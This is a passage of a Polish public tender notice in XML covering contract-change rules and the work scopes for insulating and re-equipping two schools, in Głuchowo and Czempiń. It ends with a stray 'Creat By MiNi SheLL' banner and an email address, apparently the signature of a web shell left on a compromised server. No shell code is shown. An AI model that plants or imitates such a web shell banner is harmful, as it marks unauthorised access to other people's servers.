2.	Roboty zamienne mogą być realizowane wyłącznie po uzyskaniu pisemnej zgody Zamawiającego pod rygorem nieważności, poprzedzonej uzasadnionym pisemnym zgłoszeniem przez Wykonawcę zakresu robót zamiennych. Dopuszczalne są roboty zamienne wynikające ze sposobu zagospodarowania terenu, konieczności zmian 
w dokumentacji projektowej oraz w zakresie zmian materiałów, technologii, urządzeń na materiały, technologie i urządzenia spełniające parametry techniczne lub na materiały, technologie i urządzenia o wyższych parametrach niż określone w specyfikacji istotnych warunków zamówienia, dokumentacji technicznej i ofercie Wykonawcy. 
3.	Dopuszczalne są zmiany Umowy w zakresie osób i adresów w niej wskazanych.
4.	W przypadku zmiany albo rezygnacji z podwykonawcy – jeżeli dotyczy ona podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału 
w postępowaniu, o których mowa w art. 22 ust. 1 tej ustawy, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
5.	Dopuszczalna jest zmiana osób wskazanych w ofercie na inne, spełniające wszystkie warunki określone w specyfikacji istotnych warunków zamówienia.
6.	Wszelkie zmiany Umowy wymagają dla swojej ważności formy pisemnej pod rygorem nieważności.</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>cena</kryt_0><kryt_0p>60</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci>0</ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>15/02/2017</data_skl><godz_skl>10:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki>polski</IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6></IV_6_6><IV_6_5>N</IV_6_5><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci>1</nr_czesci><nazwa>Termomodernizacja budynków SP w Głuchowie</nazwa><opis>Zadanie 1 – Termomodernizacja budynków SP w Głuchowie
Termomodernizacja budynków szkoły obejmuje w szczególności:
1.	Docieplenie stropodachu warstwą wełny mineralnej o grubości 20 cm wraz z robotami towarzyszącymi oraz usunięciem żużla z dachu, 
2.	Docieplenie ścian fundamentowych o powierzchni 274,5 m2 warstwą styropianu o grubości 16 cm wraz robotami towarzyszącymi,
3.	Docieplenie ścian zewnętrznych o powierzchni 1440,0 m2 warstwą styropianu o grubości 16 cm wraz z robotami towarzyszącymi,
4.	Wymianę instalacji elektrycznej, w szczególności rozdzielnic, instalacji odgromowych, opraw oświetleniowych zewnętrznych i wewnętrznych na ledowe, 
5.	Montaż paneli fotowoltaicznych na dachu budynku,
6.	Wymianę okien i drzwi zewnętrznych w piwnicy,
7.	Utwardzenie terenu (wykonanie opaski wokół budynków)
Zadanie 1 należy wykonać zgodnie z:
a)	Projektem budowlano-wykonawczym – Projekt zagospodarowania terenu, Projekt instalacji elektrycznych
b)	Projektem budowlano-wykonawczym uzupełniającym – Projekt branży elektrycznej
c)	Przedmiarami robót.

UWAGA dot. zadania nr 1 ! Zamawiający zwraca uwagę, że niżej wskazane roboty przedstawione w dokumentacji projektowej są wyłączone z zakresu niniejszego zamówienia: 
1.	Podniesienie attyk (rozbiórka attyk, wymurowanie nowych attyk, wykonanie obróbek blacharskich).
2.	Wymiana kotła c.o.

Dla obu obiektów należy wykonać świadectwo charakterystyki energetycznej.
Wykonawca zobowiązany będzie również do zabezpieczenia budynków przed wykonaniem robót oraz innych zaleceń wynikających z ekspertyzy przyrodniczej, inwentaryzacji przedrealizacyjnej i zaleceń nadzoru przyrodniczego.

Zamawiający przewiduje możliwość prowadzenia robót w roku szkolnym w godzinach pracy szkoły, w przypadku robót nieuciążliwych (cichych) i w dniach wolnych od pracy szkół.
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>45210000-2</cpv1c>45214000-0<czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>21/01/2017</data_kon><kryt_cena></kryt_cena><kryt_1>cena</kryt_1><kryt_1p>60</kryt_1p></cz_0><cz_1><nr_czesci>2</nr_czesci><nazwa>Termomodernizacja budynków SP w Czempiniu</nazwa><opis>Termomodernizacja budynków szkoły obejmuje w szczególności:
1.	Renowację elewacji najstarszego budynku szkoły,
2.	Termomodernizację elewacji pozostałych budynków szkoły (wykonanie nowej izolacji murów fundamentowych, odbicie odparzonych tynków, mechaniczne oczyszczenie podłoża, wykonanie warstwy termoizolacji, wykonanie nowych tynków, wymiana obróbek blacharskich, wymiana części stolarki okiennej i drzwiowej, wykonanie nowej izolacji murów fundamentowych) oraz ocieplenie poddasza starego budynku,
3.	Zamurowanie ścianki z luksferów, wykonanie nowych okien w ścianie północno-zachodniej
4.	Termomodernizacja zewnętrznych schodów, podestów i murów oporowych – wykonać dylatację ze styropianu, lub wtrysk z pianki poliuretanowej,
5.	Wymianę instalacji elektrycznych, w tym montaż nowych opraw ledowych,
6.	Wymianę instalacji c.o. wraz z grzejnikami,
7.	Wykonanie robót towarzyszących (napraw po robotach instalacyjnych) 
8.	Malowanie ścian w pomieszczeniach, w których były prowadzone prace instalacyjne
9.	Rozbudowę budynku o pomieszczenie kotłowni gazowej wraz z technologią (montażem nowych kotłów kondensacyjnych i niezbędnej armatury),
10.	Wykonanie wewnętrznej instalacji gazowej,
11.	Wykonanie instalacji elektrycznej w nowej kotłowni,
12.	Modernizację istniejącej kotłowni,
13.	Wykonanie opaski oraz chodnika przy nowej kotłowni,
14.	Rozbiórkę starego komina stalowego
Zadanie 2 należy wykonać zgodnie z:
a)	Projektem budowlano-wykonawczym (2013) – Projekt zagospodarowania terenu, Architektura, Instalacje Sanitarne, Konstrukcje, 
b)	Projektem budowlano-wykonawczym (2015) – Projekt zagospodarowania terenu, Projekt architektoniczno-budowlany, Inwentaryzacja, Konstrukcja, Kotłownia gazowa, Instalacja gazu, Instalacja elektryczna,
c)	Projektem budowlano-wykonawczym zamiennym (2016) 
d)	Projektem rozbiórki komina (2016) 
e)	Przedmiarami robót

UWAGA dot. zadania nr 2 ! Zamawiający zwraca uwagę, że część robót przedstawiona w dokumentacji projektowej wskazana do SIWZ jest wyłączona z zakresu niniejszego zamówienia. Wykaz robót, które nie są objęte niniejszym zamówieniem stanowi załącznik nr 10 do SIWZ
Dla obu obiektów należy wykonać świadectwo charakterystyki energetycznej.
Wykonawca zobowiązany będzie również do zabezpieczenia budynków przed wykonaniem robót oraz innych zaleceń wynikających z ekspertyzy przyrodniczej, inwentaryzacji przedrealizacyjnej i zaleceń nadzoru przyrodniczego.

Zamawiający przewiduje możliwość prowadzenia robót w roku szkolnym w godzinach pracy szkoły, w przypadku robót nieuciążliwych (cichych) i w dniach wolnych od pracy szkół.
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>45210000-2</cpv1c>45214000-0<czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>29/09/2017</data_kon><kryt_cena></kryt_cena><kryt_1>cena</kryt_1><kryt_1p>60</kryt_1p></cz_1></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com